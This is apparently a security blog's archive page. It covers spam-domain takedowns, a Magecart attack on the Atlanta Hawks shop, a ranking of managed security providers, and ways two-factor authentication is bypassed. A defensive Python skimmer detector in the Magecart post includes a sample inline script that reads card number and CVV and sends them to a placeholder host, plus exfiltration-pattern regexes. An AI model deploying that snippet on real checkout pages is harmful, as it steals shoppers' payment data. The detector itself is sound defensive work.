Category Archives: Website Security

15,000 Spam Domains Banned By GoDaddy

Palo Alto Networks' Unit 42 threat research team and GoDaddy partnered to take down 15,000 domains hosting spam and dubious products, from fly-by-night weight-loss pills to dodgy food supplements and everything in between. The purge did not happen overnight: the Unit 42 and GoDaddy teams spent two years on the investigation, in large part to keep false positives to a minimum.

Many of the domains named celebrities as "endorsers" of the products they sell, an attempt to borrow credibility. Gwen Stefani and even the late Stephen Hawking were presented as endorsing medical products and vouching for their health benefits. The sites behind the spamvertising were also seen copying the visual design of well-known sites such as E! Online and TMZ.

The sites also carry Facebook-style elements such as a "Like" button, but these do not work the way Facebook's do; they are simply more links to the products being sold. The sites also collect the buyer's credit card details directly, which puts the buyer's finances at risk, as the recurring-charge scheme described next shows.

“When people go to cancel, they realize that they can’t. A lot of times when they try to contact the company, no one gets back to them. No one’s ever going to get back to them, because that’s how these companies make their money, off of these refills,” explained Jen Miller-Osborn, Unit 42’s Deputy Director of Threat Intelligence.

All is not lost for victims: they can call their card issuer and ask to dispute the questionable charge. If the charge is old, disputing it is harder, and interest on it has already accrued.

“In our process of analysis, we’re presented with an array of screenshots from the virtual systems that crawl these websites; this is why after seeing these images time and time again they eventually became ingrained in my mind and I could start to recognize templates being used and their slight variations over time. While this campaign phased out, there was another running in parallel with the same tactics but a different product, switching from ‘brain supplements’ to ‘weight loss.’ It keeps the celebrity endorsement theme and continues masquerading as a legitimate website,” emphasized Jeff White, Senior Threat Researcher at Palo Alto Networks.

Some of the sites use URL-shortening services. Such redirects are risky for any user because, in the browser, the only practical way to learn where a shortened URL leads is to visit it. Finding out in advance requires a preview service such as http://checkshorturl.com/, and not every Internet user knows such services exist. We hope this article helps you reduce the risks you face online every day.
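Below is an added example, not part of the original article, showing how to learn where a shortened URL leads without loading the destination page in a browser: each hop is queried with a HEAD request and redirects are not followed automatically, so the chain is recorded hop by hop and nothing on the landing page is executed. The hosts `short.example`, `track.example` and `shop.example` in the sample chain are constructed for the demonstration and do not exist; the `fake_fetch` stub stands in for the network so the script runs offline.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib stop at the first redirect instead of silently following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def head(url: str, timeout: float = 5.0):
    """One HEAD request, no redirect following, no body download.
    Returns (status, Location header or None)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(
        url, method="HEAD", headers={"User-Agent": "shorturl-check/1.0"}
    )
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # A 3xx lands here because we refused to follow it; keep its Location.
        return err.code, err.headers.get("Location")


def expand(url: str, fetch=head, max_hops: int = 10):
    """Walk the redirect chain one hop at a time.
    Returns (chain, reason) where reason is 'final', 'loop' or 'max_hops'."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return chain, "final"
        nxt = urljoin(chain[-1], location)  # Location may be relative
        if nxt in chain:
            chain.append(nxt)
            return chain, "loop"
        chain.append(nxt)
    return chain, "max_hops"


# Constructed offline sample (hypothetical hosts): shortener -> tracker -> landing.
FAKE_HOPS = {
    "https://short.example/abc": (301, "https://track.example/r?x=1"),
    "https://track.example/r?x=1": (302, "/landing"),
    "https://track.example/landing": (302, "https://shop.example/product"),
    "https://shop.example/product": (200, None),
    "https://short.example/loop1": (302, "https://short.example/loop2"),
    "https://short.example/loop2": (302, "https://short.example/loop1"),
}


def fake_fetch(url: str):
    """Stand-in for head() so the example runs without network access."""
    return FAKE_HOPS.get(url, (404, None))


if __name__ == "__main__":
    chain, why = expand("https://short.example/abc", fetch=fake_fetch)
    print(" -> ".join(chain), f"({why})")
    # Against a live shortener, use the real fetcher: expand("https://...")
```

Two caveats a practitioner should keep in mind: the HEAD request still tells the shortener that someone was interested in the link (and some services answer HEAD differently from GET), and redirects done with JavaScript or a meta refresh on the landing page are invisible to this check, so the last hop shown is where the HTTP chain ends, not necessarily where the browser would finally land.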

Also, Read:

Beware! Even Good Domains Also Carries Malicious URLs

Federal Websites Shutdown Due to Expired Security certificates

The post 15,000 Spam Domains Banned By GoDaddy appeared first on .

Hackers Target Atlanta Hawks Online NBA Basketball Store

When it comes to cyber attack campaigns, the news usually involves a financial institution, a multinational company or a healthcare firm; a single NBA team, or any sports team, rarely figures in the typical picture of a cyber attack. However, on April 23 the Atlanta Hawks, one of the teams competing in the National Basketball Association, saw their merchandise site fall victim to an attack. The attack was apparently carried out with Magecart, a web-skimming technique in which malicious JavaScript injected into a checkout page captures customers' credit card details as they are entered. We featured Magecart, the notorious credit card stealing operation, in November 2018.

“The first time we detected skimming code on the website was June 6th of 2017. The compromise wasn’t targeted however, it was one aimed at hundreds of websites at the same time,” explained Yonathan Klijnsma, RiskIQ’s Threat Researcher.

An Atlanta Hawks spokesperson said that everything is fine now, but that the investigation into HawksShopdotcom, the team's official merchandise store, continues. “We take these matters of security and privacy extremely seriously. Yesterday, we were alerted the host site for HawksShopdotcom was subject to an isolated attack. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident. At this stage of the investigation, we believe that less than a handful of purchases on HawksShopdotcom were affected. We are continuing to investigate and will provide updates as needed,” the spokesperson said.

Security researchers reviewing HawksShopdotcom found it running Magento Commerce Cloud 2.2, Adobe's e-commerce platform. The breach may be related to imagesenginedotcom, the domain to which the stolen information was apparently sent; it is a new domain, registered on March 25, 2019.
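As an added example (not code from the Hawks investigation or from any vendor named here), the script below does the kind of check a shop owner can run against a checkout page to catch injected skimming code: it inventories every `<script>` on the page, flags external scripts loaded from hosts outside an allowlist, and flags inline scripts that reference payment fields and contain a URL pointing off-site. The sample page, the hosts `shop.example` and `static.shop.example`, and the `skimmer.invalid` domain are all constructed for the demonstration; the inline script in the sample is a minimal stand-in for a skimmer, not code recovered from any real site.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Absolute http(s) URLs inside script text (hypothetical heuristics for this example).
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>)]*)?")
PAYMENT_FIELD_RE = re.compile(
    r"\b(cc_?number|card_?number|cvv|cvc|exp(?:iry|_?month|_?year)?|cardholder)\b", re.I
)
EXFIL_API_RE = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new\s+Image|\.src\s*=)")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def audit_checkout_page(html: str, page_url: str, allowed_hosts):
    """Return a list of (kind, host(s), evidence) findings for scripts on the page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(urljoin(page_url, src)).hostname or ""
        if host not in allowed_hosts:
            findings.append(("unexpected-external-script", host, src))
    for body in parser.inline:
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)}
        offsite = sorted(hosts - set(allowed_hosts) - {None})
        if offsite:
            evidence = body.strip()[:60]
            findings.append(("inline-script-offsite-url", ",".join(offsite), evidence))
            # Payment field names plus an exfiltration primitive plus an off-site URL
            # is the classic skimmer shape; report it separately for triage.
            if PAYMENT_FIELD_RE.search(body) and EXFIL_API_RE.search(body):
                findings.append(("possible-skimmer", ",".join(offsite), evidence))
    return findings


# Constructed sample checkout page; the inline script is a stand-in, not real malware.
SAMPLE_CHECKOUT = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://static.shop.example/lib/jquery.js"></script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script>
  document.getElementById('payment').addEventListener('submit', function () {
    var d = document.querySelector('[name=cc_number]').value + '|' +
            document.querySelector('[name=cvv]').value;
    new Image().src = 'https://cdn-assets.skimmer.invalid/img.php?d=' + btoa(d);
  });
</script>
</body></html>"""

ALLOWED_HOSTS = {"shop.example", "static.shop.example"}  # hypothetical allowlist

if __name__ == "__main__":
    for kind, host, evidence in audit_checkout_page(
        SAMPLE_CHECKOUT, "https://shop.example/checkout", ALLOWED_HOSTS
    ):
        print(f"{kind:28} {host:32} {evidence}")
```

Run it against the live checkout HTML (fetched the way a customer's browser would see it, since some skimmers only appear on the checkout URL) and diff the findings over time; a new host or a new inline script on a page that should only change at deployment time is the signal. A Content-Security-Policy that restricts `script-src`, `connect-src` and `img-src` to the allowlisted hosts turns the same list into an enforced control rather than a periodic check.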

Willem de Groot, a security researcher, commented on Twitter that he doubts the Atlanta Hawks spokesperson's statement:

Last week, the NBA Hawks got hacked (@ATLHawks).

“We take these threats seriously and are investigating,” a Hawks spokesperson said. The malware is no longer active on the site, the representative said.

Is it? pic.twitter.com/zTHyG7VtBQ
— Willem de Groot (@gwillem) April 24, 2019

NBA’s Atlanta Hawks Merchandise Shop Hacked

Also, Read:

Atlanta Still Recovering Nearly Three Weeks After Cyberattack

Magstripe Credit/Debit Cards & Magstripe-only POS: A Security Nightmare

Tools and Tips to recover a Hacked Website [Infographic]


The 10 Best Managed Security Service Providers in 2019

With the endless supply of cyber threats, security breaches are always in the news, and many enterprise IT departments feel outsmarted by cybercriminals. To counter this, they turn to managed security service providers (MSSPs).

Managed security services have become big business. Companies like IBM, BT and Verizon are among the leaders in this field. These vendors augment internal security measures or take over many IT security functions outright.

This guide covers the top managed security service providers.

1. DXC Technology

DXC has a portfolio of integrated solutions that includes security advisory, risk management, intelligent security operations infrastructure, endpoint security, identity and access management, threat and vulnerability management, data protection and cloud security.

2. Symantec

Symantec provides monitoring and management of the customer's security environment, along with intelligence services, advanced threat protection, incident response, cyber skills development, intrusion detection and prevention system (IDPS) management and hosted log retention. The company assigns dedicated security analysts to prepare details and recommendations on incidents.

3. SecureWorks

SecureWorks services are accessed through the SecureWorks Client Portal and delivered via its Counter Threat Appliance (CTA) and Counter Threat Platform (CTP). It also offers Advanced Malware Protection and Detection (AMPD) in partnership with Lastline. Host- and network-based advanced threat detection are provided through SecureWorks' Advanced Endpoint Threat Detection (AETD) service. Additional services, such as vulnerability scanning and advanced threat intelligence, are also available.

4. IBM

IBM provides a wide range of MSSP services, including vulnerability scanning, security information and event management, network protection, firewall management, data protection, security intelligence analysis, web gateway management, unified threat management (UTM), secure software-defined wide area network (SD-WAN), adaptive security for hybrid cloud, endpoint security, Amazon GuardDuty management and intelligent log management in the cloud.

5. AT&T

The AT&T Threat Manager is the company’s security event monitoring and management service. Threat analysis is performed via the AT&T Threat Intellect platform, which includes SIEM, big data, and analytics. Device management is available for network security, data and application security, endpoint and mobile security. It is delivered as part of AT&T’s Threat Management and Intelligence solutions. Service options include Internet and Intranet protection, mobile security, DDoS defense, firewalls, Web application protection, IDPS, email gateway, endpoint security, encryption, device management, and token authentication.

6. Verizon

Verizon Enterprise cybersecurity provides security monitoring and operations, security professional services, network and gateway security, and incident response. Its analytics platform also includes a customer portal.

7. BT

BT offers a secure web gateway (SWG), next-generation firewall (NGFW), IDPS, UTM, managed distributed denial of service (DDoS) protection, vulnerability scanning, application security, network access control, public key infrastructure (PKI) security, patch management, threat monitoring and intelligence, email security, security information and event management (SIEM) and more. It partners with Trend Micro (Deep Security) and Symantec (SSL decryption).

8. CenturyLink

CenturyLink offers a professionally managed, network-based next-generation firewall service, together with adaptive network security and threat intelligence. CenturyLink's security operations centers (SOCs) respond to physical and logical alarms, attacks and suspicious or abnormal network activity, and assist with customer security inquiries.

9. Trustwave

Trustwave services include rogue device detection, network firewalls, IDPS, UTM and internal vulnerability scanning, all consolidated into a single appliance as a fully managed service. Trustwave's SWG decrypts, unpacks and assembles web pages to expose malicious behavior, and blocks new malware in real time.

10. HackerCombat

HackerCombat IT Service Management covers implementing and managing IT services according to customers' requirements, with the aim of simplifying and streamlining IT and security management. Its ITSM services rank among the best in the industry and aim to provide comprehensive solutions. HackerCombat Web Security software is designed to detect and remediate sophisticated threats and to provide proactive, preventive measures.

Also, Read:

Managed Service Providers in the Era of Ransomware

Ten Best Network Scanning Tools for Network Security

The Top 10 Computer Forensics Tools For Analyzing A Breach


Old-School Ways To Bypass Two-Factor Authentication

We regularly remind our readers to take advantage of two-factor authentication (2FA) on every web service they sign up for, whenever the option is available. All mainstream web services offer 2FA, usually disabled by default but enabled by the user with a few clicks. 2FA is available on Facebook, Twitter, Gmail/Google accounts, Microsoft accounts and nearly all mainstream online banking sites. Google itself requires hardware security keys for its employees' 2FA, which has reportedly made the company virtually immune to phishing and minimized the chance of credential leaks.

However, like everything else, 2FA has weaknesses, and this guide is meant to keep you from falling for the tricks that exploit them:

  • Online Blackmail

Blackmailed people tend to do what the other party wants. That makes 2FA essentially useless when a person is targeted and blackmailed: the information is leaked by the very person who uses 2FA to protect it, and no number of factors helps. It shows once more that the human operator is the weakest part of any IT security policy; the people most prone to blackmail are those with skeletons in the closet that the attackers know about. This is a classic example of how information can be extracted regardless of the security precautions and policies an organization has in place: one employee who gives in to blackmail is enough to release the information the attackers want.

  • Fake 2FA apps

Fake apps are a dime a dozen for smartphone users who download apps from outside the official app stores. This is the very reason Apple restricts iOS devices to the App Store; bypassing that restriction requires jailbreaking the device, which takes a fair amount of knowledge. Android allows sideloading, but the feature is disabled by default. Fake 2FA apps are usually trojanized versions of the genuine apps: they forward the generated code to a command-and-control server within the short window in which a time-based code remains valid, so the attacker can use it before it expires.

  • Social Engineering

Social engineering is a skill, and pulling it off takes practice. A socially engineered employee gives up information without being aware of it. The art of persuasion cannot be learned overnight; it requires careful preparation and a lot of practice to sound reasonable and believable. A campaign that attacks human weaknesses can bypass whatever technological barriers, restrictions and policies are in place.

  • MitB Campaign

MitB stands for Man-in-the-Browser, a cousin of the man-in-the-middle attack in which the malicious code sits inside the victim's own device rather than on the network, and it is strongly linked to fake apps. When a fake app runs in the background, it can monitor everything typed on the on-screen keyboard, read whatever the clipboard contains and read any SMS stored on the device. That is enough to capture both the user's credentials and the 2FA code if the same mobile device is the source of the 2FA. For those who log in on a PC and receive the 2FA code on a separate mobile device, the attacker's chance of obtaining the code in time is much smaller, though not zero: a real-time phishing relay can still forward a typed one-time code within its validity window, which is why only origin-bound hardware security keys of the kind Google uses fully resist phishing. We strongly recommend not sideloading apps at all, as it is very difficult to be sure an app is clean when it comes from outside the official app stores.

Also, Read:

The EU Knows How To Make Two-Factor Authentication Mandatory

Facebook Makes Two-Factor Authentication Easier to Set Up
